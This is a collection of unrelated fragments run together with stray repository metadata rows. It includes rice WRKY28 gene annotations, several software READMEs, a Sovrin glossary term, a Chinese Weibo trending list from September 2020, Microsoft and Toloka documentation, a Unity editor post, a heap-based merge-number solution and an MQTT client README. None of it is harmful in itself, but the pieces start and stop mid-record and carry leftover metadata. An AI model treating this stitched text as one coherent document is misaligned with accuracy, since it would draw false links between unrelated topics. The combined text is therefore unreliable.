+ [OsWRKY IIa Transcription Factors Modulate Rice Innate Immunity](http://www.ncbi.nlm.nih.gov/pubmed?term=OsWRKY IIa Transcription Factors Modulate Rice Innate Immunity%5BTitle%5D), 2010, Rice (N Y).
+ [Building a mutant resource for the study of disease resistance in rice reveals the pivotal role of several genes involved in defence](http://www.ncbi.nlm.nih.gov/pubmed?term=Building a mutant resource for the study of disease resistance in rice reveals the pivotal role of several genes involved in defence%5BTitle%5D), 2012, Mol Plant Pathol.
+ [The WRKY Gene Family in Rice Oryza sativa](http://www.ncbi.nlm.nih.gov/pubmed?term=The WRKY Gene Family in Rice Oryza sativa%5BTitle%5D), 2007, J Integr Plant Biol.
+ [OsWRKY28 Regulates Phosphate and Arsenate Accumulation, Root System Architecture and Fertility in Rice.](http://www.ncbi.nlm.nih.gov/pubmed?term=OsWRKY28 Regulates Phosphate and Arsenate Accumulation, Root System Architecture and Fertility in Rice.%5BTitle%5D), 2018, Front Plant Sci.
* **Genbank accession number**
+ [AK106282](http://www.ncbi.nlm.nih.gov/nuccore/AK106282)
+ [BK005031](http://www.ncbi.nlm.nih.gov/nuccore/BK005031)
+ [AK106282](http://www.ncbi.nlm.nih.gov/nuccore/AK106282)
+ [BK005031](http://www.ncbi.nlm.nih.gov/nuccore/BK005031)
* **Key message**
+ The transcription factor OsWRKY28 acts as a negative regulator of basal resistance, like the orthologous barley gene
+ In this study, we comprehensively analyzed the role of one of the group IIa WRKY transcription factors in rice, OsWRKY28, in the regulation of basal defense responses to a compatible race of the rice blast fungus Magnaporthe oryzae, strain Ina86-137
+ Finally, transcriptome analysis revealed that the induction of several defense-related genes in the wild type after Ina86-137 infection was counteracted in OsWRKY28-overexpressing rice plants
+ These results strongly suggest that OsWRKY28 is a negative regulator of basal defense responses against Ina86-137 and acts as a modulator to maintain the responses at an appropriate level by attenuating the activation of defense-related gene expression levels
+ The expression analyses of the group IIa WRKY transcription factors in rice revealed that OsWRKY28, together with OsWRKY71, exhibit an early-induced expression prior to the late-induced expressions of OsWRKY62 and OsWRKY76
+ Here, we report that a large inverted repeat construct designed to knock down the expression of the four OsWRKY IIa subfamily members (OsWRKY62, OsWRKY28, OsWRKY71, and OsWRKY76) leads to overexpression of all four genes and disease resistance in some transgenic plants
+ OsWRKY28, a PAMP-responsive transrepressor, negatively regulates innate immune responses in rice against rice blast fungus
+ OsWRKY28 Regulates Phosphate and Arsenate Accumulation, Root System Architecture and Fertility in Rice.
+ Exogenous JA treatments mimicked the phenotypes of the oswrky28 mutants with inhibited root elongation and decreased arsenate/phosphate translocation
+ Our results suggested that OsWRKY28 affected arsenate/phosphate accumulation, root development at the seedling stage and fertility at the reproductive stage possibly by influencing homeostasis of JA or other phytohormones
+ The expression of OsWRKY28 was markedly induced by arsenate and other oxidative stresses
+ In a hydroponic experiment, loss-of-function mutation in OsWRKY28 resulted in lower accumulation of arsenate and phosphate concentration in the shoots
* **Connection**
+ __OsWRKY28__, __OsWRKY71__, [OsWRKY28, a PAMP-responsive transrepressor, negatively regulates innate immune responses in rice against rice blast fungus](http://www.ncbi.nlm.nih.gov/pubmed?term=OsWRKY28, a PAMP-responsive transrepressor, negatively regulates innate immune responses in rice against rice blast fungus%5BTitle%5D), The expression analyses of the group IIa WRKY transcription factors in rice revealed that OsWRKY28, together with OsWRKY71, exhibit an early-induced expression prior to the late-induced expressions of OsWRKY62 and OsWRKY76
+ __OsWRKY28__, __OsWRKY62__, [OsWRKY28, a PAMP-responsive transrepressor, negatively regulates innate immune responses in rice against rice blast fungus](http://www.ncbi.nlm.nih.gov/pubmed?term=OsWRKY28, a PAMP-responsive transrepressor, negatively regulates innate immune responses in rice against rice blast fungus%5BTitle%5D), The expression analyses of the group IIa WRKY transcription factors in rice revealed that OsWRKY28, together with OsWRKY71, exhibit an early-induced expression prior to the late-induced expressions of OsWRKY62 and OsWRKY76
+ __OsWRKY28__, __OsWRKY76__, [OsWRKY28, a PAMP-responsive transrepressor, negatively regulates innate immune responses in rice against rice blast fungus](http://www.ncbi.nlm.nih.gov/pubmed?term=OsWRKY28, a PAMP-responsive transrepressor, negatively regulates innate immune responses in rice against rice blast fungus%5BTitle%5D), The expression analyses of the group IIa WRKY transcription factors in rice revealed that OsWRKY28, together with OsWRKY71, exhibit an early-induced expression prior to the late-induced expressions of OsWRKY62 and OsWRKY76
[//]: # * **Key figures**
This repository contains the files used in my portfolio [website](https://nyuriumuri.github.io/Projects/archive).
## Term/Phrase
Self-Certification Credential
## Definition
A Credential that asserts Self-Certification.
## Relevant Communities
* Sovrin
## Tags
```
#sovrin
```
# UE4_Cpp_MultiFirstPersonBase
Every time I start a new game idea that is first person, requires multiplayer, and also requires that other players have a third-person representation, I spend so long redoing the initial steps for each project that I lose momentum. This project provides a starting point with the basics already done, to allow quicker prototyping of any such game project.
Steps covered:
- Create a base third person C++ template
- Add the first person mesh and animations from the first person template
- Set up base game flow to enable remote multiplayer sessions
- Manage using different meshes/animations depending on whether the player is local or remote
Intended use:
Create a project using this as a template and get straight to prototyping!
Data for 2020-09-02 09:00
Status: 200
1.iPhone12 Pro玻璃后壳曝光
微博热度:3580672
2.王毅点名警告捷克参议长你过线了
微博热度:1574220
3.秦昊学会精打细算了
微博热度:1556782
4.王俊凯刘昊然胡先煦同游迪士尼
微博热度:1487028
5.周扬青安崎同框
微博热度:1467409
6.嵩县
微博热度:1326242
7.美国称不加入与世卫有关的疫苗开发
微博热度:998816
8.嵩县警方通报男子当街打死前女友
微博热度:538518
9.新疆宣布全面恢复正常生产生活秩序
微博热度:505780
10.领走5岁女童嫌犯涉嫌强奸被刑拘
微博热度:429721
11.抗战胜利75周年
微博热度:422927
12.被陈婷气死
微博热度:374525
13.武汉一小学请抗疫英雄家长上第一课
微博热度:363152
14.黄老板得女
微博热度:308205
15.42克金手镯洗完只剩20克
微博热度:260364
16.肖战
微博热度:249552
17.入狱4年手机被经办民警私用
微博热度:247801
18.西藏军区某旅跨昼夜协同打击演练
微博热度:247358
19.TCL大股东误操作卖出500万股
微博热度:244745
20.江南百景图
微博热度:241780
21.央视Boys合唱少年中国说
微博热度:239556
22.一颗高楼大小行星将飞过地球
微博热度:238122
23.李尖尖怼人
微博热度:236766
24.贺梅没有再婚生子
微博热度:210344
25.7岁男孩泳池排便被索赔1万5
微博热度:194751
26.猫咪通宵等主人电话
微博热度:172505
27.章子怡夸Angelababy演技
微博热度:169667
28.英伟达RTX30系列显卡
微博热度:158143
29.女校长当面吃光学生剩饭
微博热度:137847
30.3分钟混剪抗战史
微博热度:137498
31.李尖尖贺子秋给凌霄过生日
微博热度:127433
32.sp姑获鸟
微博热度:122687
33.故宫雨后现天空之镜
微博热度:114468
34.漫威群星悼念黑豹男主
微博热度:106361
35.璇玑被逼发毒誓
微博热度:102338
36.Netflix拍剧版三体
微博热度:101486
37.离人心上
微博热度:94809
38.企业领导每天鞠躬迎送员工
微博热度:91410
39.当你开学有自我介绍时
微博热度:88198
40.悲伤它追上我了
微博热度:86106
41.兼职赚150元后倒欠税款11万
微博热度:85660
42.谭松韵母亲车祸案肇事者父亲回应
微博热度:82724
43.全猪宴
微博热度:79406
44.TCL大股东李东生致歉
微博热度:78498
45.开学第一课
微博热度:78323
46.济南泉底星空隧道通车
微博热度:75782
47.东京8月187人死于中暑
微博热度:74049
48.张定宇微笑讲述自己的渐冻症
微博热度:73714
49.华春莹称美国是真正的云窃密江湖大盗
微博热度:70038
50.外交部回应美大学驱逐我公费留学生
微博热度:69096
# `tut get-hash`
**Gets current repo hash**
Grabs the current short hash of whatever repo you are currently in.
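Under the hood this is the abbreviated commit hash that git itself reports. A rough sketch of the equivalent plain-git operation, using a throwaway repository purely for demonstration (assumes `git` is installed):

```shell
# Demonstrate in a throwaway repo so no real project is touched.
tmp=$(mktemp -d)
cd "$tmp"
git init -q
git -c user.name=demo -c user.email=demo@example.com \
    commit -q --allow-empty -m "demo commit"

# The short hash of the current checkout; this is the same value
# `tut get-hash` would report when run inside this repo.
git rev-parse --short HEAD
```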
## Usage
```bash
tut get-hash
```
## Args
```
Usage:
get-hash
Options:
-h, --help Display this help message
Help:
Gets the currently checked out git hash
```
# Reward-based training of RNNs
## Requirements
This code is written in Python 2.7 and requires:
* [Theano 0.8.2](http://deeplearning.net/software/theano/)
## Notes
* For the paper, we used a time step of 10 ms, which results in hundreds of time steps for typical tasks. When training a new task, we highly recommend that you start with a larger value to save time.
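As a quick back-of-the-envelope check of why the step size matters (the 2 s trial duration here is a hypothetical example, not a value from the paper):

```python
# Number of RNN time steps needed to simulate one trial of a given length.
def num_steps(trial_duration_ms: int, dt_ms: int) -> int:
    return trial_duration_ms // dt_ms

# With the paper's 10 ms step, a hypothetical 2 s trial needs 200 steps;
# a coarser 50 ms step cuts that to 40, which trains much faster.
print(num_steps(2000, 10))  # -> 200
print(num_steps(2000, 50))  # -> 40
```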
## License
MIT
## Citation
* Song, H. F., Yang, G. R., & Wang, X.-J. (2017) Reward-based training of recurrent neural networks for cognitive and value-based tasks. eLife, in press.
---
"CC-BY-4.0",
"MIT"
] | 9 | 2018-04-30T20:49:56.000Z | 2021-11-15T11:12:48.000Z | ---
title: Gauge Public Preview
description: Gauge lets hiring managers or recruiters create questionnaires and send them to candidates as part of an assessment activity.
author: MargoC
manager: AnnBe
ms.date: 05/01/2018
ms.assetid: 6189f2a5-3778-497d-acd4-62fa6bb132fa
ms.topic: article
ms.prod:
ms.service: business-applications
ms.technology:
ms.author: margoc
audience: Admin
---
# Gauge (Public Preview)
[!include[banner](../../../includes/banner.md)]
Gauge lets hiring managers or recruiters create questionnaires and send them to
candidates as part of an assessment activity. Candidates are informed in their
candidate app that a new task is waiting for them. They can easily navigate to
the questionnaire and complete the assessment. The hiring manager and recruiter
can track the process and results directly in Attract.

<!-- Talent_Assessment activities_A.png -->
*Gauge integration*
| 35.212121 | 254 | 0.79432 | eng_Latn | 0.981603 |
9a541b1a17b4b2384749506f506f498ee334e1e5 | 978 | md | Markdown | _posts/unity/editor_utilities/2021-09-01-unity-editor-timescale-slider.md | rito15/Rito15.github.io | 1da1d7852aee3b31da194309aa21d3531ae8d872 | [
"MIT"
] | null | null | null | _posts/unity/editor_utilities/2021-09-01-unity-editor-timescale-slider.md | rito15/Rito15.github.io | 1da1d7852aee3b31da194309aa21d3531ae8d872 | [
"MIT"
] | null | null | null | _posts/unity/editor_utilities/2021-09-01-unity-editor-timescale-slider.md | rito15/Rito15.github.io | 1da1d7852aee3b31da194309aa21d3531ae8d872 | [
"MIT"
] | 5 | 2021-07-23T08:47:44.000Z | 2021-12-29T11:24:39.000Z | ---
title: Timescale Slider(게임 진행 속도 조절 슬라이더)
author: Rito15
date: 2021-09-01 16:00:00 +09:00
categories: [Unity, Unity Editor Utilities]
tags: [unity, editor, csharp, utility]
math: true
mermaid: true
---
# Summary
---
- 게임 진행 속도를 `0%` ~ `100%` 사이에서 조절할 수 있는 슬라이더를 유니티 에디터 상단 재생 버튼 우측에 생성합니다.
- 유니티 에디터 내에서만 동작하고, 빌드 이후에는 아무런 영향을 미치지 않습니다.
<br>
## 테스트 완료 에디터 버전
- 2018.3.14f1
- 2019.4.9f1
- 2020.3.14f1
- 2020.3.17f1
<br>
## Note
- 2020.3.17f1 버전까지만 정상 작동합니다.
<br>
# Preview
---


<br>
# Download
---
- [Timescale Slider.unitypackage](https://github.com/rito15/Unity-Useful-Editor-Assets/releases/download/1.04/Timescale-Slider.unitypackage)
<br>
# References
---
- <https://github.com/marijnz/unity-toolbar-extender> | 18.807692 | 140 | 0.716769 | kor_Hang | 0.931905 |
9a5491031d461dd35f75e1f5a1523cb4a8fa249f | 1,634 | md | Markdown | docs/reference/toloka.client.TolokaClient.get_skills.md | ZackPashkin/toloka-kit | 8f650e5d8cdded1949ca633cf78f9b851ce839bb | [
"Apache-2.0"
] | 153 | 2021-02-06T13:41:11.000Z | 2022-03-19T17:51:01.000Z | docs/reference/toloka.client.TolokaClient.get_skills.md | ZackPashkin/toloka-kit | 8f650e5d8cdded1949ca633cf78f9b851ce839bb | [
"Apache-2.0"
] | 29 | 2021-01-15T12:54:37.000Z | 2022-02-07T07:45:32.000Z | docs/reference/toloka.client.TolokaClient.get_skills.md | ZackPashkin/toloka-kit | 8f650e5d8cdded1949ca633cf78f9b851ce839bb | [
"Apache-2.0"
] | 17 | 2021-01-29T15:20:04.000Z | 2022-01-30T07:21:03.000Z | # get_skills
`toloka.client.TolokaClient.get_skills`
Finds all skills that match certain rules and returns them in an iterable object
Unlike find_skills, returns generator. Does not sort skills.
While iterating over the result, several requests to the Toloka server is possible.
## Parameters Description
| Parameters | Type | Description |
| :----------| :----| :-----------|
`name`|**Optional\[str\]**|<p>Skill name.</p>
`id_lt`|**Optional\[str\]**|<p>Skills with an ID less than the specified value.</p>
`id_lte`|**Optional\[str\]**|<p>Skills with an ID less than or equal to the specified value.</p>
`id_gt`|**Optional\[str\]**|<p>Skills with an ID greater than the specified value.</p>
`id_gte`|**Optional\[str\]**|<p>Skills with an ID greater than or equal to the specified value.</p>
`created_lt`|**Optional\[datetime\]**|<p>Skills created before the specified date.</p>
`created_lte`|**Optional\[datetime\]**|<p>Skills created before or on the specified date.</p>
`created_gt`|**Optional\[datetime\]**|<p>Skills created after the specified date.</p>
`created_gte`|**Optional\[datetime\]**|<p>Skills created on or after the specified date.</p>
* **Yields:**
The next object corresponding to the request parameters.
* **Yield type:**
Generator\[[Skill](toloka.client.skill.Skill.md), None, None\]
**Examples:**
How to check that a skill exists.
```python
segmentation_skill = next(toloka_client.get_skills(name='Area selection of road signs'), None)
if segmentation_skill:
print(f'Segmentation skill already exists, with id {segmentation_skill.id}')
else:
print('Create new segmentation skill here')
```
| 38 | 99 | 0.71175 | eng_Latn | 0.967701 |
9a5514c4e1bb2b709058c4894a3a6b3b917cb1fa | 13,593 | md | Markdown | windows-apps-src/get-started/construct-form-learning-track.md | danmoseley/windows-uwp | d7783efb1c60b81e94898294fc5794c1d3320004 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2021-06-29T12:07:42.000Z | 2021-06-29T12:07:42.000Z | windows-apps-src/get-started/construct-form-learning-track.md | danmoseley/windows-uwp | d7783efb1c60b81e94898294fc5794c1d3320004 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2021-05-02T05:11:43.000Z | 2021-05-02T05:11:43.000Z | windows-apps-src/get-started/construct-form-learning-track.md | danmoseley/windows-uwp | d7783efb1c60b81e94898294fc5794c1d3320004 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Learning track - Construct and configure a form
description: Learn how to construct and configure a robust form in a Universal Windows Platform (UWP) app for handling the input of a significant amount of information.
ms.date: 03/17/2021
ms.topic: article
keywords: get started, uwp, windows 10, learning track, layout, form
ms.localizationpriority: medium
ms.custom: RS5
---
# Create and customize a form
If you're creating an app that requires users to input a significant amount of information, chances are you'll want to create a form for them to fill out. This article will show you what you need to know in order to create a form that is useful and robust.
This is not a tutorial. If you want one, see our [adaptive layout tutorial](../design/basics/xaml-basics-adaptive-layout.md), which will provide you with a step-by-step guided experience.
We'll discuss what **XAML controls** go into a form, how to best arrange them on your page, and how to optimize your form for changing screen sizes. But because a form is about the relative position of visual elements, let's first discuss page layout with XAML.
## What do you need to know?
UWP does not have an explicit form control that you can add to your app and configure. Instead, you'll need to create a form by arranging a collection of UI elements on a page.
To do so, you'll need to understand **layout panels**. These are containers that hold your app's UI elements, allowing you to arrange and group them. Placing layout panels within other layout panels gives you a great deal of control over where and how your items display in relation to one another. This also makes it far easier to adapt your app to changing screen sizes.
Read [this documentation on layout panels](../design/layout/layout-panels.md). Because forms are usually displayed in one or more vertical columns, you'll want to group similar items in a **StackPanel**, and arrange those within a **RelativePanel** if you need to. Start putting together some panels now — if you need a reference, below is a basic layout framework for a two-column form:
```xaml
<RelativePanel>
<StackPanel x:Name="Customer" Margin="20">
<!--Content-->
</StackPanel>
<StackPanel x:Name="Associate" Margin="20" RelativePanel.RightOf="Customer">
<!--Content-->
</StackPanel>
<StackPanel x:Name="Save" Orientation="Horizontal" RelativePanel.Below="Customer">
<!--Save and Cancel buttons-->
</StackPanel>
</RelativePanel>
```
## What goes in a form?
You'll need to fill your form with an assortment of [XAML Controls](../design/controls-and-patterns/controls-and-events-intro.md). You're probably familiar with those, but feel free to read up if you need a refresher. In particular, you'll want controls that allow your user to input text or choose from a list of values. This is a basic list of options you could add – you don't need to read everything about them, just enough so you understand what they look like and how they work.
* [TextBox](../design/controls-and-patterns/text-box.md) lets a user input text into your app.
* [ToggleSwitch](../design/controls-and-patterns/toggles.md) lets a user choose between two options.
* [DatePicker](../design/controls-and-patterns/date-picker.md) lets a user select a date value.
* [TimePicker](../design/controls-and-patterns/time-picker.md) lets a user select a time value.
* [ComboBox](/uwp/api/Windows.UI.Xaml.Controls.ComboBox) expand to display a list of selectable items. You can learn more about them [here](../design/controls-and-patterns/combo-box.md)
You also might want to add [buttons](../design/controls-and-patterns/buttons.md), so the user can save or cancel.
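As a sketch of how some of these controls fit together in markup (the control names and strings below are placeholders, not part of the pattern itself):

```xaml
<StackPanel>
    <!-- Two-state choice -->
    <ToggleSwitch x:Name="NewsletterToggle" Header="Subscribe to newsletter"
                  OnContent="Yes" OffContent="No" Margin="0,24,0,0"/>
    <!-- Selectable list of values -->
    <ComboBox x:Name="ContactMethod" Header="Preferred contact method" Margin="0,24,0,0">
        <ComboBoxItem Content="Email" IsSelected="True"/>
        <ComboBoxItem Content="Phone"/>
        <ComboBoxItem Content="Mail"/>
    </ComboBox>
    <!-- Commit or abandon the form -->
    <StackPanel Orientation="Horizontal" Margin="0,24,0,0">
        <Button Content="Save"/>
        <Button Content="Cancel" Margin="24,0,0,0"/>
    </StackPanel>
</StackPanel>
```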
## Format controls in your layout
You know how to arrange layout panels and have items you'd like to add, but how should they be formatted? The [forms](../design/controls-and-patterns/forms.md) page has some specific design guidance. Read through the sections on **Types of forms** and **layout** for useful advice. We'll discuss accessibility and relative layout more shortly.
With that advice in mind, you should start adding your controls of choice into your layout, being sure they're given labels and spaced properly. As an example, here's the bare-bones outline for a single-page form using the above layout, controls, and design guidance:
```xaml
<RelativePanel>
<StackPanel x:Name="Customer" Margin="20">
<TextBox x:Name="CustomerName" Header= "Customer Name" Margin="0,24,0,0" HorizontalAlignment="Left" />
<TextBox x:Name="Address" Header="Address" PlaceholderText="Address" Margin="0,24,0,0" HorizontalAlignment="Left" />
<TextBox x:Name="Address2" Margin="0,24,0,0" PlaceholderText="Address 2" HorizontalAlignment="Left" />
<RelativePanel>
<TextBox x:Name="City" PlaceholderText="City" Margin="0,24,0,0" HorizontalAlignment="Left" />
<ComboBox x:Name="State" PlaceholderText="State" Margin="24,24,0,0" RelativePanel.RightOf="City">
<!--List of valid states-->
</ComboBox>
</RelativePanel>
</StackPanel>
<StackPanel x:Name="Associate" Margin="20" RelativePanel.Below="Customer">
<TextBox x:Name="AssociateName" Header= "Associate" Margin="0,24,0,0" HorizontalAlignment="Left" />
<DatePicker x:Name="TargetInstallDate" Header="Target install Date" HorizontalAlignment="Left" Margin="0,24,0,0"></DatePicker>
<TimePicker x:Name="InstallTime" Header="Install Time" HorizontalAlignment="Left" Margin="0,24,0,0"></TimePicker>
</StackPanel>
<StackPanel x:Name="Save" Orientation="Horizontal" RelativePanel.Below="Associate">
<Button Content="Save" Margin="24" />
<Button Content="Cancel" Margin="24" />
</StackPanel>
</RelativePanel>
```
Feel free to customize your controls with more properties for a better visual experience.
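For example, a few optional properties can guide the user's input; the specific values below are illustrative:

```xaml
<!-- Constrain and describe input so users make fewer mistakes:
     InputScope picks a suitable touch keyboard, MaxLength caps entry. -->
<TextBox x:Name="Phone"
         Header="Phone number"
         PlaceholderText="555-0100"
         InputScope="TelephoneNumber"
         MaxLength="20"
         Margin="0,24,0,0"
         HorizontalAlignment="Left" />
```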
## Make your layout responsive
Users might view your UI on a variety of devices with different screen widths. To ensure that they have a good experience regardless of their screen, you should use [responsive design](../design/layout/responsive-design.md). Read through that page for good advice on the design philosophies to keep in mind as you proceed.
The [Responsive layouts with XAML](../design/layout/layouts-with-xaml.md) page gives a detailed overview of how to implement this. For now, we'll focus on **fluid layouts** and **visual states in XAML**.
The basic form outline that we've put together is already a **fluid layout**, as it's depending mostly on the relative position of controls with only minimal use of specific pixel sizes and positions. Keep this guidance in mind for more UIs you might create in the future, though.
More important to responsive layouts are **visual states**. A visual state defines property values that are applied to a given element when a given condition is true. [Read up on how to do this in XAML](../design/layout/layouts-with-xaml.md#set-visual-states-in-xaml-markup), and then implement them in your form. Here's what a *very* basic one might look like in our previous sample:
```xaml
<Page ...>
<Grid>
<VisualStateManager.VisualStateGroups>
<VisualStateGroup>
<VisualState>
<VisualState.StateTriggers>
<AdaptiveTrigger MinWindowWidth="640" />
</VisualState.StateTriggers>
<VisualState.Setters>
<Setter Target="Associate.(RelativePanel.RightOf)" Value="Customer"/>
<Setter Target="Associate.(RelativePanel.Below)" Value=""/>
<Setter Target="Save.(RelativePanel.Below)" Value="Customer"/>
</VisualState.Setters>
</VisualState>
</VisualStateGroup>
</VisualStateManager.VisualStateGroups>
<RelativePanel>
<!-- Customer StackPanel -->
<!-- Associate StackPanel -->
<!-- Save StackPanel -->
</RelativePanel>
</Grid>
</Page>
```
> [!IMPORTANT]
> When you use StateTriggers, always ensure that VisualStateGroups is attached to the first child of the root. Here, **Grid** is the first child of the root **Page** element.
It's not practical to create visual states for a wide array of screen sizes, nor are more than a couple likely to have significant impact on the user experience of your app. We recommend designing instead for a few key breakpoints - you can [read more here](../design/layout/screen-sizes-and-breakpoints-for-responsive-design.md).
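For instance, one extra visual state per key breakpoint is usually enough; the 640 and 1008 effective-pixel widths below are the medium and large breakpoints from that guidance:

```xaml
<VisualStateManager.VisualStateGroups>
    <VisualStateGroup>
        <!-- Small windows (under 640 epx) use the properties as set in markup. -->
        <VisualState x:Name="Medium">
            <VisualState.StateTriggers>
                <AdaptiveTrigger MinWindowWidth="640" />
            </VisualState.StateTriggers>
            <!-- Setters for medium windows go here. -->
        </VisualState>
        <VisualState x:Name="Large">
            <VisualState.StateTriggers>
                <AdaptiveTrigger MinWindowWidth="1008" />
            </VisualState.StateTriggers>
            <!-- Setters for large windows go here. -->
        </VisualState>
    </VisualStateGroup>
</VisualStateManager.VisualStateGroups>
```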
## Add accessibility support
Now that you have a well-constructed layout that responds to changes in screen sizes, a last thing you can do to improve the user experience is to [make your app accessible](../design/accessibility/accessibility-overview.md). There's a lot that can go into this, but in a form like this one it's easier than it looks. Focus on the following:
* Keyboard support - ensure the order of elements in your UI panels match how they're displayed on screen, so a user can easily tab through them.
* Screen reader support - ensure all your controls have a descriptive name.
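Both items can often be handled directly in markup. A minimal sketch (the names and ordering are illustrative):

```xaml
<!-- TabIndex makes the keyboard order explicit; AutomationProperties.Name
     gives screen readers a label when a control has no visible Header. -->
<TextBox x:Name="CustomerName" Header="Customer Name" TabIndex="0" />
<TextBox x:Name="Address" PlaceholderText="Address" TabIndex="1"
         AutomationProperties.Name="Customer address" />
<Button Content="Save" TabIndex="2" />
```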
When you're creating more complex layouts with more visual elements, you'll want to consult the [accessibility checklist](../design/accessibility/accessibility-checklist.md) for more details. After all, while accessibility isn't necessary for an app, it helps it reach and engage a larger audience.
## Going further
Though you've created a form here, the concepts of layouts and controls are applicable across all XAML UIs you might construct. Feel free to go back through the docs we've linked you to and experiment with the form you have, adding new UI features and further refining the user experience. If you want step-by-step guidance through more detailed layout features, see our [adaptive layout tutorial](../design/basics/xaml-basics-adaptive-layout.md).
Forms also don't have to exist in a vacuum - you could go one step further and embed yours within a [list/details pattern](../design/controls-and-patterns/list-details.md) or a [NavigationView](../design/controls-and-patterns/navigationview.md). Or if you want to get to work on the code-behind for your form, you might want to get started with our [events overview](../xaml-platform/events-and-routed-events-overview.md).
## Useful APIs and docs
Here's a quick summary of APIs and other useful documentation to help you get started working with Data Binding.
### Useful APIs
| API | Description |
|------|---------------|
| [Controls useful for forms](../design/controls-and-patterns/forms.md#input-controls) | A list of useful input controls for creating forms, and basic guidance of where to use them. |
| [Grid](/uwp/api/Windows.UI.Xaml.Controls.Grid) | A panel for arranging elements in multi-row and multi-column layouts. |
| [RelativePanel](/uwp/api/Windows.UI.Xaml.Controls.RelativePanel) | A panel for arranging items in relation to other elements and to the panel's boundaries. |
| [StackPanel](/uwp/api/Windows.UI.Xaml.Controls.StackPanel) | A panel for arranging elements into a single horizontal or vertical line. |
| [VisualState](/uwp/api/Windows.UI.Xaml.VisualState) | Allows you to set the appearance of UI elements when they're in particular states. |
### Useful docs
| Topic | Description |
|-------|----------------|
| [Accessibility overview](../design/accessibility/accessibility-overview.md) | A broad-scale overview of accessibility options in apps. |
| [Accessibility checklist](../design/accessibility/accessibility-checklist.md) | A practical checklist to ensure your app meets accessibility standards. |
| [Events overview](../xaml-platform/events-and-routed-events-overview.md) | Details on adding and structuring events to handle UI actions. |
| [Forms](../design/controls-and-patterns/forms.md) | Overall guidance for creating forms. |
| [Layout panels](../design/layout/layout-panels.md) | Provides an overview of the types of layout panels and where to use them. |
| [List/details pattern](../design/controls-and-patterns/list-details.md) | A design pattern that can be implemented around one or multiple forms. |
| [NavigationView](../design/controls-and-patterns/navigationview.md) | A control that can contain one or multiple forms. |
| [Responsive design](../design/layout/responsive-design.md) | An overview of large-scale responsive design principles. |
| [Responsive layouts with XAML](../design/layout/layouts-with-xaml.md) | Specific information on visual states and other implementations of responsive design. |
| [Screen sizes for responsive design](../design/layout/screen-sizes-and-breakpoints-for-responsive-design.md) | Guidance on which screen sizes to which responsive layouts should be scoped. |
## Useful code samples
| Code sample | Description |
|-----------------|---------------|
| [Adaptive layout tutorial](../design/basics/xaml-basics-adaptive-layout.md) | A step-by-step guided experience through adaptive layouts and responsive design. |
| [Customer Orders Database](https://github.com/Microsoft/Windows-appsample-customers-orders-database) | See layout and forms in action on a multi-page enterprise sample. |
| [XAML Controls Gallery](https://github.com/Microsoft/Xaml-Controls-Gallery) | See a selection of XAML controls, and how they're implemented. |
| [Additional code samples](https://developer.microsoft.com/windows/samples) | Choose **Controls, layout, and text** in the category drop-down list to see related code samples. | | 75.938547 | 484 | 0.733907 | eng_Latn | 0.980834 |
# erna
My first trials with fritz2
---
title: Update DNS records at NameCheap
ms.author: pebaum
author: pebaum
manager: mnirkhe
ms.audience: Admin
ms.topic: article
ms.service: o365-administration
ROBOTS: NOINDEX, NOFOLLOW
localization_priority: Priority
ms.collection: Adm_O365
ms.custom:
- "100001"
- "5810"
ms.openlocfilehash: f32b9f820fce03cd8cd5d8f8eb509efbc3cdeb2f
ms.sourcegitcommit: c6692ce0fa1358ec3529e59ca0ecdfdea4cdc759
ms.translationtype: HT
ms.contentlocale: de-DE
ms.lasthandoff: 09/14/2020
ms.locfileid: "47699554"
---
# <a name="update-dns-records-at-namecheap"></a>Update DNS records at NameCheap
Use the links below to update your DNS records.
- [Create DNS records at NameCheap](https://docs.microsoft.com/microsoft-365/admin/dns/create-dns-records-at-namecheap?view=o365-worldwide)
- [Add or edit custom DNS records in Office 365](https://docs.microsoft.com/microsoft-365/admin/setup/add-domain#add-or-edit-custom-dns-records)
# 791. Merge Number
**Description**
Given `n` numbers, merge them into a single number. Each time you can only select and merge two numbers `a` and `b`, and each merge consumes `a + b` energy. Output the *minimum energy* consumed by merging all `n` numbers.
```
2 <= n <= 50000, the combined number will not exceed the int range
```
**Example**
Example 1:
```
Input: [1,2,3,4]
Output: 19
Explanation:
Merge 1,2, which consumes 3 energy, and the rest is [3,4,3].
Then merge 3,3, which consumes 6 energy, and the rest is [6,4].
Then merge the last two numbers, which consumes 10 energy, and a total of 19 energy was consumed.
```
Example 2:
```
Input: [2,8,4,1]
Output: 25
Explanation:
Merge 1,2, which consumes 3 energy, and the rest is [8,4,3].
Merge 3,4, which consumes 7 energy, and the rest is [7,8].
Merge the last two numbers, which consumes 15 energy,
and a total of 25 energy was consumed.
```
**Heap (Priority Queue)**
Greedily merging the two smallest remaining numbers at every step yields the minimum total cost — the same idea as building a Huffman tree.
```python
from heapq import heapify, heappush, heappop

class Solution:
    """
    @param numbers: the numbers
    @return: the minimum cost
    """
    def mergeNumber(self, numbers):
        if not numbers:
            return 0

        # A min-heap lets us always pick the two smallest numbers efficiently.
        heap = list(numbers)
        heapify(heap)

        ans = 0
        while len(heap) >= 2:
            # Merge the two smallest, pay their sum, and push the result back.
            merged = heappop(heap) + heappop(heap)
            ans += merged
            heappush(heap, merged)
        return ans
```
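A quick standalone sanity check of the greedy idea against the two examples above (rewritten as a plain function so it runs outside the judge):

```python
import heapq

def merge_cost(numbers):
    """Minimum total cost to merge all numbers, two at a time (Huffman-style)."""
    heap = list(numbers)
    heapq.heapify(heap)
    total = 0
    while len(heap) > 1:
        merged = heapq.heappop(heap) + heapq.heappop(heap)
        total += merged
        heapq.heappush(heap, merged)
    return total

print(merge_cost([1, 2, 3, 4]))  # 19
print(merge_cost([2, 8, 4, 1]))  # 25
```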
# Using the client
You need to include the file [MQTTClient.hpp](https://github.com/X-Ryl669/eMQTT5/blob/master/lib/include/Network/Clients/MQTT.hpp).
On top of this file, you need to specify your options by changing the various macro value (see documentation on each macro).
Typically, you'll find these macros:
1. **MQTTClientOnlyImplementation**: You are unlikely to change this macro
2. **MQTTUseAuth**: Whether in your protocol you are using the AUTH control packet
3. **MQTTDumpCommunication**: Useful for debugging, this dumps each packet sent and received, you'll need to turn this off for production
4. **MQTTAvoidValidation**: If enabled, all validation code is removed. You should only use this if you master the broker used in your installation and know it'll not send malformed packet
5. **MQTTOnlyBSDSocket**: Usually set to 1 for using plain old sockets. If set to 0, then more efficient, but larger ClassPath's network code is used
